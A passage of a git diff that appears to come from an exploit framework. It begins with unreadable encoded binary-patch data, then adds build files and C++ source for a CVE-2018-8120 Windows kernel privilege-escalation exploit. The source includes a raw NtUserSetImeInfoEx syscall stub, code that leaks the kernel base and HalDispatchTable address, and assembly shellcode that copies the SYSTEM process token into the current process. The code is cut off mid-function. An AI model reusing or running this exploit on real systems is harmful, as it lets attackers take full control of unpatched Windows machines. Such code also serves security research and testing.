z#rb8N%s7s5D&s81nT$=T(!WdjXS_)HXI!q_Un$+!Dff&Um3zjUmHQ0oeyeiNc!zS& zxLvuQCf#=`_lynYo^hXYpDEp2GGzYa7$-BPOH1^nDtpG6%063IYc6Hac#*;mXyds_G;a(*7Y{F zXEM<2jB##Md>M?lGgj+-#RqV)y_4UgY82cjP+sat2n|3gMhV9!K|0`p)j#2BjPPPxQz2ZZ}FgDm;t-};w!ov1_ zZ2uHv%T!tZuQN_&{0qjZjQ26lWc)B=7vr6b7cqX7aXI5>8P_p>i*Y044#t}q-^_R` z;}*s{7$0G*_$;xE+u8mQ<4(r!F*X<^#+{6hF*X?QVXXKd z6Bzfgy;?^rzJ=m@Sgw)fQ>nsdzJ}tXB(r_F3U3f!ES2r^*gl#2+sTYG*}j&s#^J{^ zcCr0;7%yV{6UOC?f5o_taX#Zl#?LX{%=krxIX#N6vX$){*}jPF6`y7Y+bceUh0~kB z?%Ua3@jdM9U-5xD+1|(Q%h^9qdo+XXpJw|$#)|J@WA{VY-g2$1pSg?`Un-SxGTYzH zcnkX<$2gVki}+pkdl%b(m+>OTw=hm+_cq4mY(I~&jmsyUaUI)x z8E3Hl)r=e2zD~Jk`x%Tkv;BR_KgXZQcniC~k?~e`-^6$aZx!QY#tn=&vHKesr?UP1jO*Dxi*Y8~ zuUGEbK7+A~?H^~ni17-><&6D|>liO!oXPne#<-E~zsGnp<3h$;8GoN~Hv1pWcn8}z zGhW2$y_Ru1+pl5lV*g2uJK6qL#szFYg0aE&3mNw@-ptsNDa-#s#>tGIV4TW$E8|5R z{w0hv*?tk@BDTMjv5W0*W32e1*E3$k_8SyVDf5wk7_HcYDj5o9W9gKId z{bh`|vVEztXZ$kbcE-CHcQW3_*kHVaaUbIYj4jh;dG2Lg$MKJ3oXqxjGFJ2U4;iPj zeH-I!#xF5m#Q3L-J&Ye^T+i{1V%*5~|IBzZ#;I(-gz;v!AImtC?TZ+@IQ(e}v;7Yl7cstsq+>t>@?F? z!h58&i%lP$#H5eTF-cX{810kOS0;AdNtGiXoqMHE?#gT8L>gf_dr2Ri_n?o?b1;WD<-7-7jFO|z&FQM*aEnnA^etn5bW)Z+I=@OE-GiZT z8M|M`;nm{IAANofm(Ci~N4Fv9qx%o^(P?w3%JkEDLHeqK8AXu^by^q11a}Je}q;1M2D0f<(}w~%1`CLR{JKf9t^)0 zrA_v#Jcv%yky;n0hv=2C3XkZP(x<{B`lb9i*gerPonHvm7nRpcO^wGy*A$;BU$@Ag zGZ;V7c{);eD~Ct)PFR&6(LKed(nIv04%c(oJ+%YMUp`}M4}@>W|2+8hG5t~d2&Wrr zC+YB|@`xT-% zS#q*}p%5j7eG~bil9|ahL#M*S>#<7I)0|*A%l;@=Q|mDrhp4|%?M0s738jz5BZ^JU zS7|(=*i^m9{vqUF_75TZYLWl&{(*)IgxkzWVtwl^e4w}SFk+*MznvMD&MM3$ zLM>Ou?+DV5j6Xlv52*M<{UOC4qBj{o-Pe(yj6am#C4#;v{=xMx)1hisrh{%M$WNAk zZjcUTJOx2}8BadfE{)HUZZ8xM^#F=OWjuvJ`jPR3`bilN-IkDFc(?=Wm2UBbMkX09 z-LVKy|LibK?d;ZIerm;xCNz>u|F;G0Wx8^L{fH{(P`YH#qbN)ISG@?$uc)482J2Oo zpK90A{p?^qrTfAl9ZC0kuwJG6ys-38__qho6HE81wW;=YbC^B3F9_?0s629lPFeLE-N2=Gm~aU&gaug)1>j3wIwn zfhyBOv>I+tx5L8mHwW3%C>L%|qf|InvlJEo%CP*>XeE2|lCXYUn#li^uva0_dLkXE zSK-U~vs!J@e46Nn?nKE?_9sgaLOMp)P&jg)O|>dNT946PFSTx`w4|eyRXNFdcPVBm z@{|3XJOfQ85{J(HN=*O5-P5hKfmp6K)H)#@(@=hFQ>K{}M}iKtDv zr}C$p-r<;T*$u>l?FafV9pqo0-KG#^e4+Z5cq!;AJpA$?-AMZ?+&&Jsr@M{eSgjgW z_;lxcp#8w~d4hB+!>3tIxO@K~d%9hz>}j4vH{KPdd21*?avec;>*XiceTr*9d;^-V zt5ve(BT#v(@Z|Uyq927-KO`~zSK-t6SsA29X5wAr*jo7YVd@9zzx?F7B-~!Mw~#&Isv!Nz^&9<{pIp}~?vdmth0~9m z=PND~*;D-C?kW6Ge<0Ukq4Y>Tf#OOLKZfX??oY~3V)`#XH7`~@hQg}FE38_ifcpT`p%zvVhm{tqvoaP#o|O1{i;q(Xj@e-cWMobOS8B72w+mK3Y7@-K0DFg+5} z{dM_CTpR2kB=!ZzPsy(d#h-(jIjvb1U`9TX!}y1Si$mxArQ-g+{5#+7d=nRLV*jpYm`22ML^4|Mp=0r(VGBe}n=|>wT>Xj}W@k2Sp!=_u+mI`p7Scet=Z zuzth+4>UGy3_RHUt%o*!`{75v^WE=#fAgdN{Da3H|KSr`e)Qy1KmN&2f422se*Uk& z_~oyj-uCO?JoD^tpWD9U`JFGk_|nU-w6wPE+WqRDz3uzXjRoc;38e>sOYI3moE zQPDA$*tqzFAw#XU#9_meMqF}fa>~e2qsNRLXCHsrgo%^B_Vv`uuSmNxeezWqS5KKb z?V4+^%bY$V>-rnMabtGzl9Ez)+0ycgyO&i~Ro8gF>8dCwhpF8-&xiY{({ z@2b^n*8Xqj|9?CF|8n{3GjklySvR?IXWyKcKWA>iE%W9V;+=s-x7{ww|Kj$47v=w7 zCBKVj?<pcj;v1&*}BncxTv! z91$Ufz+P5dQR(;6+?K)>_V!7oalqBSW!~z_D$ithotXMo`)X>*L}B3`GAkVJl{LksFt%T57rOAs?G@FKl2KebnNlg!J;-0UYt2;*X&bekVqZylVeyhm zHI3JDZgr+l$+$W*J@e`*8FqJ_r?RHPXJ4|?p6#!Ocnoi9xzFdRopIGwODlZk{w0%3 zYO1c1HkXTd7m&1w8RU^l#188!NV$k}))iNID#I);t9JYBen^P07nfF5RP+CtQiozr*5i);s!fVq`1r0l{r#U{ZPWP=9UZ20XGT&WQ1Gx=U zKeJG~c3+L%>#nV-T<*4C#BFLu-K0gA%iLH$5Z+!Tq)y33dUf0 z77InyhlND$AnW5ovM&ZWC3--H?I=A&fl~6>CskI~UAdyh3+hl1^Z|E;-ioDg13@VE z<^IZQx3_pnMP-F=<>bkeh5cL<%?groQ@s>M6il2p$9Ie0?OmA*VKv_6qOp}hJc-Q5 z`Q>vVw_%y0{39LCO80WKA0z{UFqR{@rEW@s_{ct|(p_9l)_zaO9I}-bW1d!swcSd= z-yrE@Qc5Ao2Bh`AADCoEO~TsCjujvMr=5-Y@a4pgij?gnD{7$#V?KNoLuTEb*ynd+ z6-#_o$$Pm2t4NA32l0_aMG9HUm?9Z+B-vmgY{`d`2R2^212KExi(;UBaOK%cyd)#2 z)V=~u!S1O*%PbwwvMouUl8abhGNaTcR36T>_agmpFY1-}vy!mI>w3M_cZKSCsIjY0#i71ffU9W1| z_;JzNxIey}eCbE8BwKdxNp2aYX?eqOjy>0;jkiQ-mT9|_3GW^OnGDLT^wng-Z{hbE znIRJcakQo(ObuabgTgeyEt00iO^epzrbK%ZaUt4@d|0Q%dkU|I9qcP{xOq8#?-&61 z5>w)|6kmdtQW~$NOoM*jh~D8{i5=uV0`>;nUTKHOijT>)ru`P!X~)yIj1yDLTFT53 zo+J!pDvrIdHzVP<{1rC=*zXN@Gs2>c@Znb)qm4lNM@&iVQsF&=elKG}D7;va$5<_H zUUV>Db}al~#IFuK%oXXpPpapcm^ji)Nh{ zD&sP=>rVW3s{GrcHJdL+vmsx$DG9-R%|Mwg#_x!7ml&-jq7D+L4C#vZ#1*Oh$4`aK z6a0FWJ1VPb@l-~=)~+Ef;cidD-K1&A3)gSTwei5U=1Hbw7^PTe?#lJMDRGtm!$;#$jxULKvd$#G&n= z{h&OO=Gi=^LHRbtMrg59qB2r4;#P)rW56FO15ap zrT7)bXvrws4@IyM1kq(%NS~Fd0(Jn<@U0MhgZQ{}?!#yT@f@UurqS*`M zH9N}PK4o<8$gbp$OIngVMC;UE678_xJx;Ux#=`9wxErn6aj`R{_tLHr9g^me6m7?y zcy$fGv0Uzdg#LlMLO2n^1%@Nu;Zv-F=E#o^<@zK1rn8@Cp#KEFd8%!OwPn>FFD*sC zf}iqpE%b}=Q+`Z>CgVYqae^jIV-mD6zIbg6%47`6WDLq=%oLIO783+244D?I4Ve;M zV2X~=qNhY;$o>OT3cb-D69hI`ypbMrQACDpbFyDibom}OUTt7fdyrmIIgA3?r=TxE zd8Z)0lqsT5X;J>3gWFZLkh8$~jODhf>|?<;9D*N}KdFhA#-Z-4sJEforSpdOCU#jn zi0YO5Ux1N46`M&v9#C#Eq7PJVBCxr68-8ud4fT5;q0jS$r4xOha{mGj;d)nv+^0;6 z(=I7Y)GnE3(=PE2>$Pjp21kKO^Yv(?aPCMY8mGQI@%+9rnC|!Q*R*r^ zeZlz@b>fZ45PmMwXME74X_syc^%*8HCRkB_L$#E`A*e%)4-b#%5`6*2FjGu~7GwH> zs2{2$`q3xa3)7J*$6XI=+A;hRy4g(!MTL0l<_3v}2e{UxF-ZJPCP zyeB1nh;y8882b7|(3edco-_2}xL!+FbVp>18q2Akq(3YC4b`l_5&o_j=d;0|q|4z` zhk6J5qx2_Uq)-3&Cz=-j(@>u-%Jx3QBgzNmQW%BuiPVyYp&yNlAX?5a4UN!-PKnDf z4WsgkLwP}+BFigLmV2;G+_p{AYVZq|JN3oLqwP1KLJ#%+vc6IvbY#f1ByGsaXb;gO z?fIraP)Ynr+3tg8=?U66-w177X%hPGVcNLg1jo<en|@ zoRrRa=x0Q~l!$)GhJMM4erc#S=3&{Zri_Z#5=@C&cw6z1UolP%!#I_Qcrac)983e( zH)ypKw2J;*%w@bIx>Ay(wAc?+NU}{9QCi1DYeP@QbSWFkgNQ?nA7Nw4u%s@UCzyss zYr{Sot_|}gYQql47l``04B=pom#EU35h2P#gcB8^MNKntnT$u7Bww&hwjnK^Le+va z?H71!!QKlwpZvxKthG;J<~a#DRAKH?>8%F1+ZN`|1+yZ!+Y)A04zmK7UFiGAdm^&j z|M8xPEQkNC_e2(&!k_0jXu{e)NAgA>3)Q_)dxs^YD#iewPK_Wp17xadRb-Z5Q|hmD zOW~oowl+U<9@su4JXF(OC3~MN{iM{azVpzCHV-a2O*dEO>;iv=~m2K=|g!etSEKoloxxoccPTG zuqJ4)?WGXr`%1ZbwG&Z7`mZ3Ticsi;=Yao*l8rVw+?C)|4lbC@CLu$ZTn1$ae;~`G z8hkc)P5~D6VHn8>BZ6ZlT1X=-=%SEkkF<(@+wO(C1-&0X7NmO#3Qi7muH^qj1SDsaE_b z4(b}nED^t9{3G-6_>uWF_z}hwLEs$57>Iuil{K!5Tg+k?{$_!fZnUv-tc#!pZedS>P|55kv8`bhH&xoW-_rC zKQQ!nn3@01BwdtDcy@YGGO_=6rs97utpB$N!xSMUEB_c1l%o4q-Z!2L_NVVl&5wQ} z)pbvF{h4&xYwCr%74BP~diyE6v_9|ux^vPfo7LZbMfWsKKap;Bej2f(s=TY zi-*7FN5aP~m{8sF_CLLC*Y0}z?zg9$@BT>V@4L?6yxkg^vVyw@uD57h%nA1uDeWU! zwXmANs*TkoR+CvB&FVx}Gg!@J)x~Ndt3|9g$7&s`t5~gPbv>(%tUk!Sk8Au)3AiXIXubRTchj#;>vZCaYbn_OjZ?swGO6QxdDmtlC-4VAaLy|7q`hz?>-W zJU-h)$@OTBo;`zbnhLn71vkig2H7P8t`aI}Eci5{)a>C(I2H&5FybOX5Mu!evS`{O z%%A+3%uHsYS2d+uh`4y+c~*#mlB>W)K}nC(Cq3;M7399Zommb&+g_ii&vVan*Lj{F zpYObR=bd-H@4T~_$@?+`-#>ijy5D5LWYA>TWW;3DWXvRIGH0@2vTU+u5|8az+NaH= z-K4{$)1=EJYtm!VYtm=ZZ!%yqXfkXvYLYXVGdWOx!CWtyteC8svsat2Q60pADK|EFBL;EUyadAt9u&*^x6-!WAde|5c`Ek=5QHONjj z82baq`Q_stSpOVf=t$GO2`#iv3)O8PjnczQjQyN`>`%j0=F(-B%S4TG|5(y6MT!Bx z2K>2hqETM6$z}L~H$*@3eqpJtVsJy-aQf_7y1%6RG8S@%a@z5I#Whn`x)E`I9p)|0+Q-R7`fCf7CV@x8sDww+2J`tajZZ+~ya)&nBVE=yCCuZ**KXWZCL<%a-r+O!rMbk=`oQ+;BttYiHKaT3;SD`|(fSnk#Ruf7rNND9%0_SvYOqPoK8`=xg8i_m0Ad89ayR zd$rG4K65W_{rX`sNdMH`v+kSlFSl=edf_E&e(Qeu;OLH_@Axiz@wMN$OBan;J7w4u zb#M9uH=BB4UZ;M+FK<|P$~~^NXYz`7-{{``=1KRSGiUaZQAWqPvgH-Pt|<=Ij;E9_V(D9P!FKJv%3iZC}5_-G1j?FFpM1 zjIK+5aj*OE2TdC<-1X$6-}CZydLH`0FFyy6%Iiv039&kL@b_;8)2`9e#`p^@7jiA1U6h@XbhWU3Z^EGztSkj1FlCnQO*W%i5+9~GC_`?wla|GHCRz~8Qf&CJPj578`yaGY>v4iu>^iHt#YKCb>It%&{l!vGx=vZ=K z$xOF5!fOQOA%+liTwUNVO8?8KwpM3V;fN_Im`p6&Kx3=xN|bh!`}{)nsf-+>M|z3*bs8yh5G`_%?#t>ooY# zSd@u&>;nJ8)OGMddz@Kzaq|zac+y7lQH^z>9rG{!2j#LHUW}X2EmlW^m8l_}vh? z0!HsaJ3$klzZdm~&Vw}s)t@-nZ)gj6sNL|NICu`m9wWa69F3ql5H&>qIR-Ad4`m_G zQt(3r<@pG-br@w5|LT6^NBR)(;9PhPeF(f@p5d((^dhJ}#M88nJjCXIF!n|4G&Rvb zAJ1ZEz$@?##C^zL2B&u7c%gg1lL#ua3N|k=>PEbFv7uS;UQ_$Qh^b59-!8#9fO5Rx z76ctvH@H0n-=R71MFf?f2Y-VgPd)s^@LsueuAKSo(AVe480cg zt~NCB|`uj3?&7(Lckbg9I7D0WGS;sIxK~SD;VDn?> zQ>ZiX7=q6K3OF-rlpg_KM$j?#f`9qAp@)F;5&iyvcl-$FF!Iats9Ysh(fcV4-td*gYAfJ=peWl5r>X}J2zom8MG&cI&U^SU;89H zL?n=Y8vNlF;~4$mjIC%>q|XG8J%#HRbcKkZYXWh~(}stBaPKyFf@@R}ob(K?>Cis# z=Ll+}9`LsaI`%=^am_@Kz6X4dH1b!$%Xb**!$Acx9O;8N^f>|kLKD}CcsD3?6#P8F zFdLwmB+d&8XrepCFh7H4!A}v?cBjE{X`?>P;7kP7fw&2A1o>lNbB19~Kocj*3xWLo5JCoA<`Ta z(nOjYLYhePJV+C1o(5^+K~ocHz6GTd2UiVEq%r=KPNZ@8q=_^JpEPm4scCFHjdQ1T zB8^ceO{B5tq=_`vn>3NeZj&a`_+8S(QKrVx{(1R-??6NUZ^Sm^Hu^j_=zrP3_v)`m zr}u4o@R>i?z^tT9Us_t+;RT%ob46Pl$6o7fw0F=LJIqULZM<{lEn{4b_Rvy{ylU@U zw6LSK@xhKzqkG~vzTVOv3gM01oe$bkz`{^#Bi?&|V`xsGV?ldp%z}AymMjV_x_{{y zOnAMqJ+$E35^rk{@0?LrCs$0N*i}o|903i)G=on z=5ju0t|Mhh$6~w$9TO3~1G6qe=RQ3DsXH2#h9$w(b?MA9-6vv`6A3I zZL}|&H)+lsj6G~^yuZCO)X`{fI#*6h)9>C(OVbzX)Y5eB;IMg1(|~VS`BGbaDmT_cU8BfNS z31q^VXeOSKGWkp~Q_fT~^^8Tf$qv~idt{#+ki&9Rj?0pqmy2>)uF7@UqSzFN;!-?{ zPYEbtC91>~Ny#fkrL0tyx?)jnszY_D9@VD?)UX;=u6;h>CB~?o?X=~b^cBa|1H|cQmeH)5 zU2|%z=GFXKP>X0Wjni^kK`Ut$t)?-$Rk!O-oz=a%Uk~aLJ*IPdPA}*sy`tB2OzdOu z^%EV;%Go(5$8uiI&jq;%7vnfC#}&8|SK(?L!&`Yf@8ntD%lr8tAK_y>$LIJ0U*ao# zjb{X_U>BSMD|iLJ5ELRpOyJOC3qlF~wI(p46}`?WvZ7b?i$O6W#zaoci3PDFR>Ydf zB&-R0!kJ(b-h@99Ohgi~1dRk3f~ploM~3m^-qx&VBppS|)zNkqw4M#^=Rga(q#(SB z!yO6!(cgl&*XXam1y0-G zwF7Ru;I{{k$I;`;=xsK*8-TlE_*+5$s-cH5f(72%;4bwu7Cp_2zUD`7BbTG_Igao5 I|5um)1iaR?OaK4? diff --git a/external/source/exploits/CVE-2018-8120/CVE-2018-8120.sln b/external/source/exploits/CVE-2018-8120/CVE-2018-8120.sln new file mode 100755 index 0000000000..a9ee202779 --- /dev/null +++ b/external/source/exploits/CVE-2018-8120/CVE-2018-8120.sln @@ -0,0 +1,28 @@ + +Microsoft Visual Studio Solution File, Format Version 12.00 +# Visual Studio 2013 +VisualStudioVersion = 12.0.21005.1 +MinimumVisualStudioVersion = 10.0.40219.1 +Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "CVE-2018-8120", "CVE-2018-8120\CVE-2018-8120.vcxproj", "{B076D8F6-7924-42DD-B101-54A162D2EBD0}" +EndProject +Global + GlobalSection(SolutionConfigurationPlatforms) = preSolution + Debug|Win32 = Debug|Win32 + Debug|x64 = Debug|x64 + Release|Win32 = Release|Win32 + Release|x64 = Release|x64 + EndGlobalSection + GlobalSection(ProjectConfigurationPlatforms) = postSolution + {B076D8F6-7924-42DD-B101-54A162D2EBD0}.Debug|Win32.ActiveCfg = Debug|Win32 + {B076D8F6-7924-42DD-B101-54A162D2EBD0}.Debug|Win32.Build.0 = Debug|Win32 + {B076D8F6-7924-42DD-B101-54A162D2EBD0}.Debug|x64.ActiveCfg = Debug|x64 + {B076D8F6-7924-42DD-B101-54A162D2EBD0}.Debug|x64.Build.0 = Debug|x64 + {B076D8F6-7924-42DD-B101-54A162D2EBD0}.Release|Win32.ActiveCfg = Release|Win32 + {B076D8F6-7924-42DD-B101-54A162D2EBD0}.Release|Win32.Build.0 = Release|Win32 + {B076D8F6-7924-42DD-B101-54A162D2EBD0}.Release|x64.ActiveCfg = Release|x64 + {B076D8F6-7924-42DD-B101-54A162D2EBD0}.Release|x64.Build.0 = Release|x64 + EndGlobalSection + GlobalSection(SolutionProperties) = preSolution + HideSolutionNode = FALSE + EndGlobalSection +EndGlobal diff --git a/external/source/exploits/CVE-2018-8120/CVE-2018-8120/CVE-2018-8120.vcxproj b/external/source/exploits/CVE-2018-8120/CVE-2018-8120/CVE-2018-8120.vcxproj new file mode 100755 index 0000000000..4e9c6ce019 --- /dev/null +++ b/external/source/exploits/CVE-2018-8120/CVE-2018-8120/CVE-2018-8120.vcxproj @@ -0,0 +1,154 @@ + + + + + Debug + Win32 + + + Debug + x64 + + + Release + Win32 + + + Release + x64 + + + + {B076D8F6-7924-42DD-B101-54A162D2EBD0} + Win32Proj + CVE20188120 + + + + Application + true + v120 + Unicode + + + Application + true + v120 + Unicode + + + Application + false + v120 + true + Unicode + + + Application + false + v120 + true + Unicode + + + + + + + + + + + + + + + + + + + + true + + + true + + + false + + + false + + + + + + Level3 + Disabled + WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions) + + + Console + true + + + + + + + Level3 + Disabled + WIN32;_DEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions) + + + Console + true + + + + + Level3 + + + MaxSpeed + true + true + WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions) + MultiThreaded + + + Console + false + true + true + + + + + Level3 + + + MaxSpeed + true + true + WIN32;NDEBUG;_CONSOLE;_LIB;%(PreprocessorDefinitions) + MultiThreaded + + + Console + false + true + true + + + + + + + + + + + + + \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8120/CVE-2018-8120/CVE-2018-8120.vcxproj.filters b/external/source/exploits/CVE-2018-8120/CVE-2018-8120/CVE-2018-8120.vcxproj.filters new file mode 100755 index 0000000000..9677223056 --- /dev/null +++ b/external/source/exploits/CVE-2018-8120/CVE-2018-8120/CVE-2018-8120.vcxproj.filters @@ -0,0 +1,27 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;hm;inl;inc;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + + + Source Files + + + \ No newline at end of file diff --git a/external/source/exploits/CVE-2018-8120/CVE-2018-8120/Source.cpp b/external/source/exploits/CVE-2018-8120/CVE-2018-8120/Source.cpp new file mode 100755 index 0000000000..06edb885be --- /dev/null +++ b/external/source/exploits/CVE-2018-8120/CVE-2018-8120/Source.cpp @@ -0,0 +1,667 @@ +#define PSAPI_VERSION 1 +#include +#include +#include +#include +//#pragma comment(lib,"ntdll.lib") +#pragma comment(lib, "Psapi.lib") + + + +#ifndef _WIN64 +typedef +NTSYSAPI +NTSTATUS +(NTAPI *_NtAllocateVirtualMemory)( +IN HANDLE ProcessHandle, +IN OUT PVOID *BaseAddress, +IN ULONG ZeroBits, +IN OUT PULONG RegionSize, +IN ULONG AllocationType, +IN ULONG Protect); + +struct tagIMEINFO32 +{ + unsigned int dwPrivateDataSize; + unsigned int fdwProperty; + unsigned int fdwConversionCaps; + unsigned int fdwSentenceCaps; + unsigned int fdwUICaps; + unsigned int fdwSCSCaps; + unsigned int fdwSelectCaps; +}; + +typedef struct tagIMEINFOEX +{ + HKL__ *hkl; + tagIMEINFO32 ImeInfo; + wchar_t wszUIClass[16]; + unsigned int fdwInitConvMode; + int fInitOpen; + int fLoadFlag; + unsigned int dwProdVersion; + unsigned int dwImeWinVersion; + wchar_t wszImeDescription[50]; + wchar_t wszImeFile[80]; + __int32 fSysWow64Only : 1; + __int32 fCUASLayer : 1; +}IMEINFOEX, *PIMEINFOEX; + +struct _HEAD +{ + void *h; + unsigned int cLockObj; +}; + +struct tagKBDFILE +{ + _HEAD head; + tagKBDFILE *pkfNext; + void *hBase; + void *pKbdTbl; + unsigned int Size; + void *pKbdNlsTbl; + wchar_t awchDllName[32]; +}; + +typedef struct _tagKL +{ + _HEAD head; + _tagKL *pklNext; + _tagKL *pklPrev; + unsigned int dwKL_Flags; + HKL__ *hkl; + tagKBDFILE *spkf; + tagKBDFILE *spkfPrimary; + unsigned int dwFontSigs; + unsigned int iBaseCharset; + unsigned __int16 CodePage; + wchar_t wchDiacritic; + tagIMEINFOEX *piiex; + unsigned int uNumTbl; + tagKBDFILE **pspkfExtra; + unsigned int dwLastKbdType; + unsigned int dwLastKbdSubType; + unsigned int dwKLID; +}tagKL, *P_tagKL; +DWORD gSyscall = 0; + +__declspec(naked) void NtUserSetImeInfoEx(PVOID tmp) +{ + _asm + { + + mov esi, tmp; + mov eax, gSyscall; + mov edx, 0x7FFE0300; + call dword ptr[edx]; + ret 4; + } +} +#else +extern "C" void NtUserSetImeInfoEx(PVOID); +typedef +NTSYSAPI +NTSTATUS +(NTAPI *_NtAllocateVirtualMemory)( +IN HANDLE ProcessHandle, +IN OUT PVOID *BaseAddress, +IN ULONG ZeroBits, +IN OUT PULONG64 RegionSize, +IN ULONG AllocationType, +IN ULONG Protect); +#endif + +typedef struct +{ + LPVOID pKernelAddress; + USHORT wProcessId; + USHORT wCount; + USHORT wUpper; + USHORT wType; + LPVOID pUserAddress; +} GDICELL; +typedef NTSTATUS(__stdcall*RtlGetVersionT)(PRTL_OSVERSIONINFOW lpVersionInformation); + +typedef BOOL(WINAPI *LPFN_GLPI)( + PSYSTEM_LOGICAL_PROCESSOR_INFORMATION, + PDWORD); + +typedef NTSTATUS(WINAPI *NtQueryIntervalProfile_t)(IN ULONG ProfileSource, + OUT PULONG Interval); + +NtQueryIntervalProfile_t NtQueryIntervalProfile; + + +DWORD gTableOffset = 0; +HANDLE gManger, gWorker; + +#ifdef _WIN64 +ULONG64 gtable; +#else +DWORD gtable; +#endif + +#ifdef _WIN64 +ULONG64 getpeb() +{ +#else +DWORD getpeb() +{ +#endif +#ifdef _WIN64 + ULONG64 p = (ULONG64)__readgsqword(0x30); + p = *(ULONG64*)(p + 0x60); +#else + DWORD p = (DWORD)__readfsdword(0x18); + p = *(DWORD*)((char*)p + 0x30); +#endif + return p; +} +#ifdef _WIN64 +ULONG64 getgdi() +{ +#else +DWORD getgdi() +{ +#endif +#ifdef _WIN64 + return *(ULONG64*)(getpeb() + gTableOffset); +#else + return *(DWORD*)(getpeb() + gTableOffset); +#endif + +} +PVOID getpvscan0(HANDLE h) +{ + if (!gtable) + gtable = getgdi(); +#ifdef _WIN64 + ULONG64 p = gtable + LOWORD(h) * sizeof(GDICELL); + GDICELL *c = (GDICELL*)p; + return (char*)c->pKernelAddress + 0x50; +#else + DWORD p = (gtable + LOWORD(h) * sizeof(GDICELL)) & 0x00000000ffffffff; + GDICELL *c = (GDICELL*)p; + return (char*)c->pKernelAddress + 0x30; +#endif +} + + +#ifdef _WIN64 +typedef unsigned __int64 QWORD, *PQWORD; +typedef QWORD DT; +#else +typedef DWORD DT; +#endif + +extern "C" DT g_EPROCESS_TokenOffset = 0, g_EPROCESS = 0, g_flink = 0, g_kthread = 0, g_PID = 0; +#ifdef _WIN64 +extern "C" void shellcode08(void); +extern "C" void shellcode7(void); +#else + +__declspec(noinline) int shellcode() +{ + __asm { + pushad;// save registers state + mov edx, g_kthread; + mov eax, fs:[edx];// Get nt!_KPCR.PcrbData.CurrentThread + mov edx, g_EPROCESS; + mov eax, [eax + edx];// Get nt!_KTHREAD.ApcState.Process + mov ecx, eax;// Copy current _EPROCESS structure + mov esi, g_EPROCESS_TokenOffset; + mov edx, 4;// WIN 7 SP1 SYSTEM Process PID = 0x4 + mov edi, g_flink; + mov ebx, g_PID; + SearchSystemPID: + mov eax, [eax + edi];// Get nt!_EPROCESS.ActiveProcessLinks.Flink + sub eax, edi; + cmp[eax + ebx], edx;// Get nt!_EPROCESS.UniqueProcessId + jne SearchSystemPID; + + mov edx, [eax + esi];// Get SYSTEM process nt!_EPROCESS.Token + mov[ecx + esi], edx;// Copy nt!_EPROCESS.Token of SYSTEM to current process + popad;// restore registers state + + // recovery + xor eax, eax;// Set NTSTATUS SUCCEESS + + } +} +#endif +DWORD GetCpuNumber() +{ + LPFN_GLPI glpi; + BOOL done = FALSE; + PSYSTEM_LOGICAL_PROCESSOR_INFORMATION buffer = NULL; + PSYSTEM_LOGICAL_PROCESSOR_INFORMATION ptr = NULL; + DWORD returnLength = 0; + DWORD logicalProcessorCount = 0; + DWORD numaNodeCount = 0; + DWORD processorPackageCount = 0; + DWORD byteOffset = 0; + + glpi = (LPFN_GLPI)GetProcAddress( + GetModuleHandle(TEXT("kernel32")), + "GetLogicalProcessorInformation"); + if (NULL == glpi) + { + puts("[-] GetLogicalProcessorInformation is not supported."); + return (1); + } + + while (!done) + { + DWORD rc = glpi(buffer, &returnLength); + + if (FALSE == rc) + { + if (GetLastError() == ERROR_INSUFFICIENT_BUFFER) + { + if (buffer) + free(buffer); + + buffer = (PSYSTEM_LOGICAL_PROCESSOR_INFORMATION)malloc( + returnLength); + + if (NULL == buffer) + { + puts("[-] Error: Allocation failure"); + return (1); + } + } + else + { + printf("[-] Error %d\n", GetLastError()); + return 1; + } + } + else + { + done = TRUE; + } + } + + ptr = buffer; + + while (byteOffset + sizeof(SYSTEM_LOGICAL_PROCESSOR_INFORMATION) <= returnLength) + { + switch (ptr->Relationship) + { + + case RelationProcessorPackage: + // Logical processors share a physical package. + processorPackageCount++; + + default: + break; + } + byteOffset += sizeof(SYSTEM_LOGICAL_PROCESSOR_INFORMATION); + ptr++; + } + + return processorPackageCount; +} +// detect extract kernel images. +char* DetectKernel(PDWORD offset) +{ + BOOL pae = FALSE; + *offset = 0; + int tmp[4]; + RtlSecureZeroMemory(tmp, sizeof(tmp)); + __cpuid(tmp, 1); + + if (tmp[3]&0x40) + { + pae = TRUE; + } + + if (GetCpuNumber()>1) + { +#ifndef _WIN64 + if (pae) + { + *offset = 0x9000; + return "ntkrpamp.exe"; + } + else +#endif + { + return "ntkrnlmp.exe"; + } + } + else + { +#ifndef _WIN64 + + if (pae) + { + *offset = 0x9000; + return "ntkrnlpa.exe"; + } + else +#endif + { + return "ntoskrnl.exe"; + } + } +} + +PVOID leakHal() +{ + DT ntoskrnlBase; + DT HalDTUser, HalDTOffset; + HMODULE userKernel; + char * FuncAddress = 0L; + + LPVOID drivers[1024]; + DWORD cbNeeded; + + if (EnumDeviceDrivers(drivers, sizeof(drivers), &cbNeeded) && cbNeeded < sizeof(drivers)) + { + if (drivers[0]) + { + ntoskrnlBase = (DT)drivers[0]; + } + } + else + { + printf("[-] EnumDeviceDrivers failed; array size needed is %d\n", cbNeeded / sizeof(LPVOID)); + } + // ntoskrnlBase = (DWORD)pModuleInfo->Modules[0].ImageBase; + DWORD offset = 0; + bool failback = false; + char *kernel = DetectKernel(&offset); + printf("[+] Detected kernel %s\n", kernel); + userKernel = LoadLibraryExA(kernel, NULL, DONT_RESOLVE_DLL_REFERENCES); + if (userKernel == NULL) + { + printf("[-] Could not load %s , load ntoskrnl.exe instead.\n",kernel); + userKernel = LoadLibraryExA("ntoskrnl.exe", NULL, DONT_RESOLVE_DLL_REFERENCES); + failback = true; + if (userKernel == NULL) + { + puts("[-] Could not load ntoskrnl.exe"); + return FALSE; + } + } + + HalDTUser = (DT)GetProcAddress(userKernel, "HalDispatchTable"); + HalDTOffset = HalDTUser - (DT)userKernel; + + if (failback) + { + return (PVOID)(ntoskrnlBase + HalDTOffset + offset); + } + else + { + return (PVOID)(ntoskrnlBase + 